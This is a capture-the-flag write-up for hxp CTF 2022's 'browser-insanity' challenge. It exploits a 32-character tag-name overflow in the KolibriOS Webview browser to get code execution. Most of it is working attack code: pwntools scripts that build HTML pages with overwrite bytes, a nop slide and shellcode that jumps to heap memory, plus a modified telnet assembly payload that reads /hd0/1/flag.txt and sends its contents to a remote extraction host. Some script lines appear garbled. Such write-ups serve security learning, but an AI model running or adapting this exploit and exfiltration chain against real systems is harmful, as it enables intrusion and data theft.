Tags: kolibrios hxp c-- assembly i386 x86
Author: 0x6fe1be2
Version: 12-03-23
Status: solved (w0y)
Category: PWN, ZAJ (Awesome)
Teammates: m4ttm00ny, EspressoForLife
Points: 435 (14 Solves)
browser-insanity is a pwn challenge that requires you to exploit a browser from a niche custom x86-32 Kernel called KolibriOS. The default Browser in KolibriOS called Webview only supports html. Looking into the source code shows that there is an issue on how html tags are parsed.
This allows us to create an indefinite recursion which actually overflows into executed code. This is possible because KolibriOS doesn't have any memory protection features like multiple pages and permissions.
This overflow is used to jump into user controlled memory and prepare our RCE payload. At last we open a connection to our extraction URL and get the Flag. Exploit is at the end of the chapter.
Ever wanted to hack a tiny OS written in x86-32 assembly and C--? Me neither but it’s hxp CTF 2022.
Give us an URL, the user in the KolibriOS VM will visit it. You need to get the flag from /hd0/1/flag.txt
The source code you could get from https://repo.or.cz/kolibrios.git/tree/7fc85957a89671d27f48181d15e386cd83ee7f1a
The browser is at programs/cmm/browser in the source tree. It relies on a couple of different libraries (e.g. programs/develop/libraries), grep around.
KolibriOS has its own debugger, DEBUG, available on the desktop. It may come in useful.
The kernel ABI is at kernel/trunk/docs/sysfuncs.txt
For building random pieces:
INCLUDE=path_to_header.inc fasm -m 1000000 -s debug.s file.asm file.out
Connection (mirrors):
nc 27499
# Container setup scripts
# QEMU Setup
The most interesting files are run_vm.sh and enter_challenge.py because it shows us how to start the KolibriOS Machine
# The monitor is necessary to send mouse and keyboard events to write the address.
# For debugging, you may want to replace -nographic with -s
qemu-system-x86_64 \
-cpu qemu64 \
-smp 1 \
-m 128 \
-serial mon:stdio \
-snapshot \
-no-reboot \
-boot a \
-fda kolibri.img \
-hda flag.img \
enter_challenge.py shows us how the service interacts with the machine, which can basically be summarized as visiting a given URL with the build-in Browser Webview.
One of the hardest parts of the challenge was creating a prober Test Environment, because we need to learn a new Kernel and Debugging Tool.
by modifying run_vm.sh we can get a graphical system
qemu-system-x86_64 \
-cpu qemu64 \
-smp 1 \
-m 1024 \
-daemonize \git clone https://repo.or.cz/kolibrios.git # detach into graphics window
-snapshot \
-no-reboot \
-boot a \
-fda kolibri.img \ # Kolibri OS mounted to /syz/
-hda images/flag_fake.img \ # flag.img mounted to /hd0/1/
We can also mount the operating image to copy our own binaries for testing.
mkdir kolibriimg
sudo mount -o loop kolibri.img kolibriimg
Webview is the integrated Browser of KolibriOS which we need to exploit.
Luckily KolibriOS has it's own integrated Debugging Tool which will be very useful.
Important Commands
load <FILE_PATH> # Load Programm e.g. load /sys/Network/Webview
g # Start File
s # step jmp into
n # next jmp over
bpm w <ADDR> # break on memory access write
d <ADDR> # show data at ADDR
u <ADDR> # show intructions at ADDR
terminate # Terminate current session
git clone https://repo.or.cz/kolibrios.git
cd kolibrios
git checkout 7fc85957a89671d27f48181d15e386cd83ee7f1a
kolibrios # root dir
kolibrios/kernel # kernel code
kolibrios/programs # programs inside os
kolibrios/programs/network # networking programs (important for exploit)
kolibrios/programs/cmm/browser # browser
fasm test.asm test
Included Files e.g. include 'macros.inc'
need to be in the same directory, the best directory for compiling files is kolibrios/programs/
There is a .txt file that explains the different Syscalls of the kernel.
One interesting Quirk of this kernel is that similarly to a Commodore 64 the kernel provides APIs to render images and flip pixels.
Even though this seems useful for creating a payload at the end i decided that it would be easier to copy a payload together from different code samples.
HeaderThese tags are required for rendering a page as html
HyperlinksCreate Links to other pages, but also local programs (yeah wtf)
ImagesAllows displaying data as image
/sys/File Managers
/sys/Network/Webview # Executable we need to exploit
Important Addresses
Base Address (Executed file)0x00002800
Start of Stack0x00003900
Location of our tag structure0x00012b0f
Start of our tag write routine0x00400000
User controlled Memory (probably heap) contains our Webpagem4ttm00ny notized that there the browser crashes when a tag over the size of 32 char is specified. Sadly we never really found out where the unsafe source code is located it is probably this:
void TWebBrowser::ParseHtml(dword _bufpointer, _bufsize){
if (ESBYTE[bufpos] == '<') && (is_html) {
if (strchr("!/?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", ESBYTE[bufpos+1])) {
if (tag.parse(#bufpos, bufpointer + bufsize)) {
struct _tag
char name[32];
char prior[32];
bool opened;
collection attributes;
collection values;
dword value;
dword number;
bool is();
bool parse();
dword get_next_param();
dword get_value_of();
signed get_number_of();
} tag=0;
bool _tag::parse(dword _bufpos, bufend) {
// probably this
if (name) strcpy(#prior, #name); else prior = '\0';
We spend some time trying to understand why exactly this causes the code to crash
Looking at memory after the crash shows that memory is filled with our 32 byte tag.
After spending some more time in the debugger EspressoForLife and I concluded that we actually overflow into executed code (This wasn't as obvious as in gdb, because errors make the instruction pointer jump to the start of the page 0x00000000
, not showing an invalid instruction was executed).
We create a simple webpage that crashes the browser
from pwn import *
HEADER = b'<html><body>'
def tagger(tag):
return b'<' + tag + b'/>'
with open('exploit.htm', 'wb') as exploithtm:
NOTE: Webview has a strong cache setting, therefore cache needs to be cleared before each visit with CTRL+F5
If we now open our program and set a write breakpoint at 0x12b0e (with bpm w 12b0e
) we can see our write routine and how our overwrite happens
Using cylic_find('acaa')+4
we see that the overflow starts after 11 chars. We also see that our overwrite routine checks for null bytes with test al, al
, which is why we need to exclude null chars. We can now rewrite our script to jmp into our tag like this:
from pwn import *
HEADER = b'<html><body>'
def tagger(tag):
return b'<' + tag + b'/>'
gen = cyclic_gen()
exploit = gen.get(0xb)
# don't overwrite lodsb intruction to keep overwrite routine going
exploit += asm('lodsb')
# jmp location doesn't matter because we only write the first byte
exploit += asm('jmp $')
# realine gen.get
# make sure our exploit is
exploit += gen.get(0x20 - len(exploit))
with open('test.htm', 'wb') as exploithtm:
We once again use cyclic_find('aafa')
to see our first code execution starts at offset 18.
Because our controlled code execution starts at offset 18 we only have about 14 bytes of RCE (32-18), which isn't enought to read and extract our flag, that is why we need to jmp into user controlled memory, were we can execute more Instructions.
from pwn import *
HEADER = b'<html><body>'
def tagger(tag):
return b'<' + tag + b'/>'
gen = cyclic_gen()
exploit = gen.get(0xb)
exploit += asm('lodsb')
exploit += asm('jmp $')
# align cyclic
# align tag
exploit + = gen.get(0x12)
# 9 byte exploit goes here
exploit += b''
# make sure our exploit is 32 chars long
# align cyclic
exploit += gen.get(0x20 - len(exploit))
with open('test.htm', 'wb') as exploithtm:
# append a lot of characters
exploithtm.write(cyclic(MAX_LENGTH, alphabet=string.printable.encode()))
After allocating a lot of memory through adding a lot of characters (0x100000
) we can jump through memory in 0x100000
steps to see were our data is written and we find out, that 0x400000
hast allocated our data.
We can use this knowledge to rewrite our exploit to jmp to 0x400000
and place a NOP slide at user controlled memory
from pwn import *
HEADER = b'<html><body>'
def nop(size):
return b'\x90' * size
def tagger(tag):
return b'<' + tag + b'/>'
JMP_CODE = 0x12
gen = cyclic_gen()
exploit = gen.get(OVERFLOW_START)
exploit += asm('lodsb')
exploit += asm('jmp $')
exploit += gen.get(JMP_CODE - len(exploit))
# 14 byte exploit goes here
exploit += asm('xor eax, eax')
exploit += asm('mov al, 0x40')
exploit += asm('shl eax, 0x10')
exploit += asm('jmp eax')
# make sure our exploit is 32 chars long
exploit += gen.get(TAG_LENGTH - len(exploit))
with open('test.htm', 'wb') as exploithtm:
# append a lot of NOPs
We can now append our payload to the nop slide and get arbitary code execution
Now we only need to create a payload. Because I didn't want to learn how SYSCALLS work in this Operating system i decided to create a setup script that copies a payload at the into the base address at 0x00000000
which makes it possible to compile payload with fasm.
from pwn import *
HEADER = b'<html><body>'
def nop(size):
return b'\x90' * size
def tagger(tag):
return b'<' + tag + b'/>'
# create exploit
# setup payload
# read payload from compiled binary
ENTRY = 0x24
with open(PAYLOAD_FILE, 'rb') as test:
payload = test.read()
# set MOV destination (edi) to base address 0x00000000
setup = asm('xor edi, edi')
# MOV the entire payload to destination
setup += asm(f'mov ecx, {len(payload)}')
# trick we use to set the source to current EIP
get_eip = asm('call $+5')
print(get_eip.hex(), len(get_eip))
setup += get_eip
setup += asm('pop esi')
# Add offset from EIP to start of payload
setup += asm('add esi, 13')
# MOV PAYLOAD to destination
setup += asm('rep movsb')
setup += asm(f'mov eax, {ENTRY}')
setup += asm(f'jmp eax')
# Combine setup and payload
payload = setup + payload
# Append nopslide
payload = nop(MAX_LENGTH-len(payload)) + payload
with open('test.htm', 'wb') as exploithtm:
# append payload
We can get the entrypoint either by copying the binary to the kolbri.img and load it into the debugger or read the file header with:
> head test -c 16 | hexdump -C
00000000 4d 45 4e 55 45 54 30 31 01 00 00 00 24 00 00 00 |MENUET01....$...|
In this case the Entrypoint is 0x24
And It works:
In order to read and extract the flag we need to understand the kernel, especially syscalls. Even though there isn't any good documentation we are provide a lot of sample programs in the repository. The most interesting ones are:
a telnet implementation for KolibriOS that can be used for creating a remote connection to our extraction URL
a tool that sends files or clipboard content to dpaste.com, this gives us an example on how to read files
we use programs/network/telnet/telnet.asm as our template
; send data routine
mcall 40, 0
mcall 68, 12, 32768 ; read flag file
test eax, eax
jz .error
mov [file_struct.buf], eax
mov [clipboard_data], eax
mcall 70, file_struct
cmp eax, 6
jne .error
mov [clipboard_data_length], ebx
mov eax, [clipboard_data]
jmp .loop
mov ecx, 0xc
mov esi, file_error
mov edi, clipboard_data
rep movsb
; send data to Remote
mov ebx, [counter]
mov esi, [clipboard_data]
add esi, ebx
add ebx, 2
mov [counter], ebx
mov ax, [esi]
mov [send_data], ax
xor esi, esi
inc esi
test al, al
jz done
inc esi
mcall send, [socketnum], send_data ; send data to remote URL
invoke con_get_flags
jmp .loop
socketnum dd ?
buffer_ptr rb BUFFERSIZE+1
file_error db 'Error with file', 0xa, 0, 0
file_done db 'File loaded', 0xa, 0, 0
param db '/hd0/1/flag.txt', 0 ; file to extract
send_data dw ?
counter dd 0
identifier dd 0
clipboard_data dd 0 ; file data ptr
clipboard_data_length dd 0
send_ptr dd ?
hostname db '', 0 ; extraction URL
dd 0 ; read file
dd 0 ; offset
dd 0 ; reserved
dd 32768 ; max file size
.buf dd 0 ; buffer ptr
db 0
dd param
Now we finalize our generator script and get:
from pwn import *
HEADER = b'<html><body>'
def nop(size):
return b'\x90' * size
def tagger(tag):
return b'<' + tag + b'/>'
# create exploit
# setup payload
# read payload from compiled binary
ENTRY = 0x1a1
with open(PAYLOAD_FILE, 'rb') as test:
payload = test.read()
# set MOV destination (edi) to base address 0x00000000
setup = asm('xor edi, edi')
# MOV the entire payload to destination
setup += asm(f'mov ecx, {len(payload)}')
# trick we use to set the source to current EIP
get_eip = asm('call $+5')
print(get_eip.hex(), len(get_eip))
setup += get_eip
setup += asm('pop esi')
# Add offset from EIP to start of payload
setup += asm('add esi, 13')
# MOV PAYLOAD to destination
setup += asm('rep movsb')
setup += asm(f'mov eax, {ENTRY}')
setup += asm(f'jmp eax')
# Combine setup and payload
payload = setup + payload
# Append nopslide
payload = nop(MAX_LENGTH-len(payload)) + payload
payload_wrap = b"<img src='data:base64,'" + payload + b"'/>"
with open('test.htm', 'wb') as exploithtm:
# append a lot of characters
And we managed to extract the fake flag!!!
Now we only need to make our website and extract port publicly visible and we WIN!!!
from pwn import *
HEADER = b'<html><body>'
ENTRY = 0x1A1
out = []
# PAYLOAD_FILE='./test'
with open(PAYLOAD_FILE, 'rb') as test:
payload = test.read()
setup = asm('xor edi, edi')
setup += asm(f'mov ecx, {len(payload)}')
get_eip = asm('call $+5')
print(get_eip.hex(), len(get_eip))
setup += get_eip
setup += asm('pop esi')
setup += asm('add esi, 13')
setup += asm('rep movsb')
setup += asm(f'mov eax, {ENTRY}')
setup += asm(f'jmp eax')
print(7, len(setup), setup.hex())
payload = setup + payload
payload = (b'\x90'*(MAX_LENGTH-len(payload))) + payload
IMG = b'<img src="data:image/png;base64,'+ payload + b'" />'
def nop(size):
return b'\x90' * size
def tagger(tag):
return b'<' + tag + b'/>'
def vtagger(tag):
return tagger(b'a' + tag)
def ctagger(size):
return tagger(cyclic(size))
def otagger(tag):
padding = cyclic(0x1f)
return tagger(padding+tag)
exploit = b'a'
exploit += nop(0xa)
exploit += b'\xac'
exploit += asm('jmp $-0x1d')
exploit += nop(4)
exploit += asm('xor eax, eax', arch='i386')
exploit += asm('mov al, 0x40', arch='i386')
exploit += asm('shl eax, 0x10', arch='i386')
exploit += asm('mov ax, 0x0101', arch='i386')
exploit += asm('jmp eax', arch='i386')
exploit += nop(0x20-len(exploit))
with open('exploit.htm', 'wb') as exploithtm:
;; ;;
;; Copyright (C) KolibriOS team 2010-2015. All rights reserved. ;;
;; Distributed under terms of the GNU General Public License ;;
;; ;;
;; telnet.asm - Telnet client for KolibriOS ;;
;; ;;
;; Written by hidnplayr@kolibrios.org ;;
;; ;;
;; Version 2, June 1991 ;;
;; ;;
format binary as ""
; standard header
db 'MENUET01' ; signature
dd 1 ; header version
dd start ; entry point
dd i_end ; initialized size
dd mem+4096 ; required memory
dd mem+4096 ; stack pointer
dd hostname ; parameters
dd 0 ; path
include 'macros.inc'
purge mov,add,sub
include 'proc32.inc'
include 'dll.inc'
include 'network.inc'
; entry point
; load libraries
stdcall dll.Load, @IMPORT
test eax, eax
jnz exit
; initialize console
invoke con_start, 1
invoke con_init, 80, 25, 80, 25, title
; Check for parameters
cmp byte[hostname], 0
jne resolve
invoke con_cls
; Welcome user
invoke con_write_asciiz, str1
; write prompt
invoke con_write_asciiz, str2
; read string (wait for input)
mov esi, hostname
invoke con_gets, esi, 256
; check for exit
test eax, eax
jz done
cmp byte[esi], 10
jz done
mov [sockaddr1.port], 23 shl 8 ; Port is in network byte order
; delete terminating newline from URL and parse port, if any.
mov esi, hostname
cmp al, ':'
je .do_port
cmp al, 0x20
ja @r
mov byte[esi-1], 0
jmp .done
xor eax, eax
xor ebx, ebx
mov byte[esi-1], 0
cmp al, ' '
jbe .port_done
sub al, '0'
jb hostname_error
cmp al, 9
ja hostname_error
lea ebx, [ebx*4+ebx]
shl ebx, 1
add ebx, eax
jmp .portloop
xchg bl, bh
mov [sockaddr1.port], bx
; resolve name
push esp ; reserve stack place
invoke getaddrinfo, hostname, 0, 0, esp
pop esi
; test for error
test eax, eax
jnz dns_error
invoke con_cls
invoke con_write_asciiz, str3
invoke con_write_asciiz, hostname
; write results
invoke con_write_asciiz, str8
; convert IP address to decimal notation
mov eax, [esi+addrinfo.ai_addr]
mov eax, [eax+sockaddr_in.sin_addr]
mov [sockaddr1.ip], eax
invoke inet_ntoa, eax
; write result
invoke con_write_asciiz, eax
; free allocated memory
invoke freeaddrinfo, esi
invoke con_write_asciiz, str9
mcall socket, AF_INET4, SOCK_STREAM, 0
cmp eax, -1
jz socket_err
mov [socketnum], eax
mcall connect, [socketnum], sockaddr1, 18
test eax, eax
jnz socket_err
mcall 40, EVM_STACK
invoke con_cls
mcall 18, 7
push eax
mcall 51, 1, thread, mem - 2048
pop ecx
mcall 18, 3
invoke con_get_flags
test eax, 0x200 ; con window closed?
jnz exit
mcall recv, [socketnum], buffer_ptr, BUFFERSIZE, 0
cmp eax, -1
je closed
mov esi, buffer_ptr
lea edi, [esi+eax]
mov byte[edi], 0
cmp byte[esi], 0xff ; Interpret As Command
jne .no_cmd
; TODO: parse options
; for now, we will reply with 'WONT' to everything
mov byte[esi+1], 252 ; WONT
add esi, 3 ; a command is always 3 bytes
jmp .scan_cmd
cmp esi, buffer_ptr
je .print
push esi edi
sub esi, buffer_ptr
mcall send, [socketnum], buffer_ptr, , 0
pop edi esi
cmp esi, edi
jae mainloop
invoke con_write_asciiz, esi
test al, al
jz .print
jmp .loop
invoke con_write_asciiz, str6
jmp prompt
invoke con_write_asciiz, str5
jmp prompt
invoke con_write_asciiz, str11
jmp prompt
invoke con_write_asciiz, str12
jmp prompt
invoke con_exit, 1
mcall close, [socketnum]
mcall -1
mcall 40, 0
; read flag file
mcall 68, 12, 32768
test eax, eax
jz .error
mov [file_struct.buf], eax
mov [clipboard_data], eax
mcall 70, file_struct
cmp eax, 6
jne .error
mov [clipboard_data_length], ebx
mov eax, [clipboard_data]
jmp .loop
mov ecx, 0xc
mov esi, file_error
mov edi, clipboard_data
rep movsb
; invoke con_getch2
mov ebx, [counter]
mov esi, [clipboard_data]
add esi, ebx
add ebx, 2
mov [counter], ebx
mov ax, [esi]
mov [send_data], ax
xor esi, esi
inc esi
test al, al
jz done
inc esi
mcall send, [socketnum], send_data
invoke con_get_flags
jmp .loop
; data
title db 'Telnet',0
str1 db 'Telnet for KolibriOS',10,10,\
'Please enter URL of telnet server (host:port)',10,10,\
'fun stuff:',10,\
'telehack.com - arpanet simulator',10,\
'towel.blinkenlights.nl - ASCII Star Wars',10,\
'nyancat.dakko.us - Nyan cat',10,10,0
str2 db '> ',0
str3 db 'Connecting to ',0
str4 db 10,0
str8 db ' (',0
str9 db ')',10,0
str5 db 'Name resolution failed.',10,10,0
str6 db 'Could not open socket.',10,10,0
str11 db 'Invalid hostname.',10,10,0
str12 db 10,'Remote host closed the connection.',10,10,0
.port dw 0
.ip dd 0 ;
rb 10
align 4
library network, 'network.obj', console, 'console.obj'
import network, \
getaddrinfo, 'getaddrinfo', \
freeaddrinfo, 'freeaddrinfo', \
inet_ntoa, 'inet_ntoa'
import console, \
con_start, 'START', \
con_init, 'con_init', \
con_write_asciiz, 'con_write_asciiz', \
con_exit, 'con_exit', \
con_gets, 'con_gets',\
con_cls, 'con_cls',\
con_getch2, 'con_getch2',\
con_set_cursor_pos, 'con_set_cursor_pos',\
con_write_string, 'con_write_string',\
con_get_flags, 'con_get_flags'
socketnum dd ?
buffer_ptr rb BUFFERSIZE+1
file_error db 'Error with file', 0xa, 0, 0
file_done db 'File loaded', 0xa, 0, 0
; file to extract
param db '/hd0/1/flag.txt', 0
send_data dw ?
counter dd 0
identifier dd 0
clipboard_data dd 0
clipboard_data_length dd 0
send_ptr dd ?
; extraction URL IP:PORT
hostname db '', 0
dd 0 ; read file
dd 0 ; offset
dd 0 ; reserved
dd 32768 ; max file size
.buf dd 0 ; buffer ptr
db 0
dd param
Flag: hxp{wHy_h4cK_Chr0m3_wh3n_y0u_c4n_hAcK_BROWSER}